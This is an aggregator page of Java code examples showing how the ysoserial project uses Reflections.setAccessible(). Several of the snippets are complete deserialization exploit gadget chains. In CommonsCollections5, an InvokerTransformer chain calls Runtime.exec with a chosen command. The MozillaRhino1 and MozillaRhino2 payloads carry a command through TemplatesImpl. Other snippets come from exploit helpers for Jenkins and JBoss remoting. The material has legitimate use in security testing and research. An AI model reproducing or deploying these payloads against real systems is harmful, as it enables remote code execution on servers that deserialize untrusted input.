Java Code Examples for ysoserial.payloads.util.Reflections#setAccessible()

The following examples show how to use ysoserial.payloads.util.Reflections#setAccessible() . You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example 1
Source File: Hibernate1.java    From ysoserial with MIT License 6 votes vote down vote up
public static Object makeHibernate4Getter ( Class<?> tplClass, String method ) throws ClassNotFoundException, NoSuchMethodException,
        SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
    Class<?> getterIf = Class.forName("org.hibernate.property.Getter");
    Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
    Constructor<?> bgCon = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
    Reflections.setAccessible(bgCon);

    if ( !method.startsWith("get") ) {
        throw new IllegalArgumentException("Hibernate4 can only call getters");
    }

    String propName = Character.toLowerCase(method.charAt(3)) + method.substring(4);

    Object g = bgCon.newInstance(tplClass, tplClass.getDeclaredMethod(method), propName);
    Object arr = Array.newInstance(getterIf, 1);
    Array.set(arr, 0, g);
    return arr;
}
 
Example 2
Source File: MyfacesTest.java    From ysoserial with MIT License 6 votes vote down vote up
@Override
public Object call () throws Exception {
    java.lang.reflect.Method setFC = FacesContext.class.getDeclaredMethod("setCurrentInstance", FacesContext.class);
    Reflections.setAccessible(setFC);
    ClassLoader oldTCCL = Thread.currentThread().getContextClassLoader();
    Thread.currentThread().setContextClassLoader(this.getClass().getClassLoader());
    FacesContext ctx = createMockFacesContext();
    try {
        setFC.invoke(null, ctx);
        return super.call();
    }
    finally {
        setFC.invoke(null, (FacesContext) null);
        Thread.currentThread().setContextClassLoader(oldTCCL);
    }
}
 
Example 3
Source File: JenkinsListener.java    From ysoserial with MIT License 5 votes vote down vote up
private static Object makeIsPresentOnRemoteCallable ( int oid, Object uro, Class<?> reqClass )
        throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, ClassNotFoundException {
    Constructor<?> reqCons = reqClass.getDeclaredConstructor(int.class, Method.class, Object[].class);
    Reflections.setAccessible(reqCons);
    return reqCons
            .newInstance(oid, JarLoader.class.getMethod("isPresentOnRemote", Class.forName("hudson.remoting.Checksum")), new Object[] {
                uro,
    });
}
 
Example 4
Source File: JBoss.java    From ysoserial with MIT License 5 votes vote down vote up
private static VersionedConnection makeVersionedConnection ( Channel c )
        throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, MalformedURLException {
    VersionedConnection vc;
    Class<?> vcf = Class.forName("org.jboss.remotingjmx.VersionedConectionFactory");
    Method vcCreate = vcf.getDeclaredMethod("createVersionedConnection", Channel.class, Map.class, JMXServiceURL.class);
    Reflections.setAccessible(vcCreate);
    vc = (VersionedConnection) vcCreate.invoke(null, c, new HashMap(), new JMXServiceURL("service:jmx:remoting-jmx://"));
    return vc;
}
 
Example 5
Source File: JenkinsCLI.java    From ysoserial with MIT License 5 votes vote down vote up
public static Callable<?, ?> getPropertyCallable ( final Object prop )
        throws ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
    Class<?> reqClass = Class.forName("hudson.remoting.RemoteInvocationHandler$RPCRequest");
    Constructor<?> reqCons = reqClass.getDeclaredConstructor(int.class, Method.class, Object[].class);
    Reflections.setAccessible(reqCons);
    Object getJarLoader = reqCons
            .newInstance(1, Class.forName("hudson.remoting.IChannel").getMethod("getProperty", Object.class), new Object[] {
                prop
    });
    return (Callable<?, ?>) getJarLoader;
}
 
Example 6
Source File: CommonsCollections5.java    From ysoserial with MIT License 5 votes vote down vote up
public BadAttributeValueExpException getObject(final String command) throws Exception {
	final String[] execArgs = new String[] { command };
	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
	        new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(Runtime.class),
			new InvokerTransformer("getMethod", new Class[] {
				String.class, Class[].class }, new Object[] {
				"getRuntime", new Class[0] }),
			new InvokerTransformer("invoke", new Class[] {
				Object.class, Object[].class }, new Object[] {
				null, new Object[0] }),
			new InvokerTransformer("exec",
				new Class[] { String.class }, execArgs),
			new ConstantTransformer(1) };

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

	BadAttributeValueExpException val = new BadAttributeValueExpException(null);
	Field valfield = val.getClass().getDeclaredField("val");
       Reflections.setAccessible(valfield);
	valfield.set(val, entry);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return val;
}
 
Example 7
Source File: MozillaRhino2.java    From ysoserial with MIT License 4 votes vote down vote up
public Object getObject( String command) throws Exception {
    ScriptableObject dummyScope = new Environment();
    Map<Object, Object> associatedValues = new Hashtable<Object, Object>();
    associatedValues.put("ClassCache", Reflections.createWithoutConstructor(ClassCache.class));
    Reflections.setFieldValue(dummyScope, "associatedValues", associatedValues);

    Object initContextMemberBox = Reflections.createWithConstructor(
        Class.forName("org.mozilla.javascript.MemberBox"),
        (Class<Object>)Class.forName("org.mozilla.javascript.MemberBox"),
        new Class[] {Method.class},
        new Object[] {Context.class.getMethod("enter")});

    ScriptableObject initContextScriptableObject = new Environment();
    Method makeSlot = ScriptableObject.class.getDeclaredMethod("accessSlot", String.class, int.class, int.class);
    Reflections.setAccessible(makeSlot);
    Object slot = makeSlot.invoke(initContextScriptableObject, "foo", 0, 4);
    Reflections.setFieldValue(slot, "getter", initContextMemberBox);

    NativeJavaObject initContextNativeJavaObject = new NativeJavaObject();
    Reflections.setFieldValue(initContextNativeJavaObject, "parent", dummyScope);
    Reflections.setFieldValue(initContextNativeJavaObject, "isAdapter", true);
    Reflections.setFieldValue(initContextNativeJavaObject, "adapter_writeAdapterObject",
        this.getClass().getMethod("customWriteAdapterObject", Object.class, ObjectOutputStream.class));
    Reflections.setFieldValue(initContextNativeJavaObject, "javaObject", initContextScriptableObject);

    ScriptableObject scriptableObject = new Environment();
    scriptableObject.setParentScope(initContextNativeJavaObject);
    makeSlot.invoke(scriptableObject, "outputProperties", 0, 2);

    NativeJavaArray nativeJavaArray = Reflections.createWithoutConstructor(NativeJavaArray.class);
    Reflections.setFieldValue(nativeJavaArray, "parent", dummyScope);
    Reflections.setFieldValue(nativeJavaArray, "javaObject", Gadgets.createTemplatesImpl(command));
    nativeJavaArray.setPrototype(scriptableObject);
    Reflections.setFieldValue(nativeJavaArray, "prototype", scriptableObject);

    NativeJavaObject nativeJavaObject = new NativeJavaObject();
    Reflections.setFieldValue(nativeJavaObject, "parent", dummyScope);
    Reflections.setFieldValue(nativeJavaObject, "isAdapter", true);
    Reflections.setFieldValue(nativeJavaObject, "adapter_writeAdapterObject",
        this.getClass().getMethod("customWriteAdapterObject", Object.class, ObjectOutputStream.class));
    Reflections.setFieldValue(nativeJavaObject, "javaObject", nativeJavaArray);

    return nativeJavaObject;
}
 
Example 8
Source File: MozillaRhino1.java    From ysoserial with MIT License 4 votes vote down vote up
public Object getObject(final String command) throws Exception {

        Class nativeErrorClass = Class.forName("org.mozilla.javascript.NativeError");
        Constructor nativeErrorConstructor = nativeErrorClass.getDeclaredConstructor();
        Reflections.setAccessible(nativeErrorConstructor);
        IdScriptableObject idScriptableObject = (IdScriptableObject) nativeErrorConstructor.newInstance();

        Context context = Context.enter();

        NativeObject scriptableObject = (NativeObject) context.initStandardObjects();

        Method enterMethod = Context.class.getDeclaredMethod("enter");
        NativeJavaMethod method = new NativeJavaMethod(enterMethod, "name");
        idScriptableObject.setGetterOrSetter("name", 0, method, false);

        Method newTransformer = TemplatesImpl.class.getDeclaredMethod("newTransformer");
        NativeJavaMethod nativeJavaMethod = new NativeJavaMethod(newTransformer, "message");
        idScriptableObject.setGetterOrSetter("message", 0, nativeJavaMethod, false);

        Method getSlot = ScriptableObject.class.getDeclaredMethod("getSlot", String.class, int.class, int.class);
        Reflections.setAccessible(getSlot);
        Object slot = getSlot.invoke(idScriptableObject, "name", 0, 1);
        Field getter = slot.getClass().getDeclaredField("getter");
        Reflections.setAccessible(getter);

        Class memberboxClass = Class.forName("org.mozilla.javascript.MemberBox");
        Constructor memberboxClassConstructor = memberboxClass.getDeclaredConstructor(Method.class);
        Reflections.setAccessible(memberboxClassConstructor);
        Object memberboxes = memberboxClassConstructor.newInstance(enterMethod);
        getter.set(slot, memberboxes);

        NativeJavaObject nativeObject = new NativeJavaObject(scriptableObject, Gadgets.createTemplatesImpl(command), TemplatesImpl.class);
        idScriptableObject.setPrototype(nativeObject);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Field valField = badAttributeValueExpException.getClass().getDeclaredField("val");
        Reflections.setAccessible(valField);
        valField.set(badAttributeValueExpException, idScriptableObject);

        return badAttributeValueExpException;
    }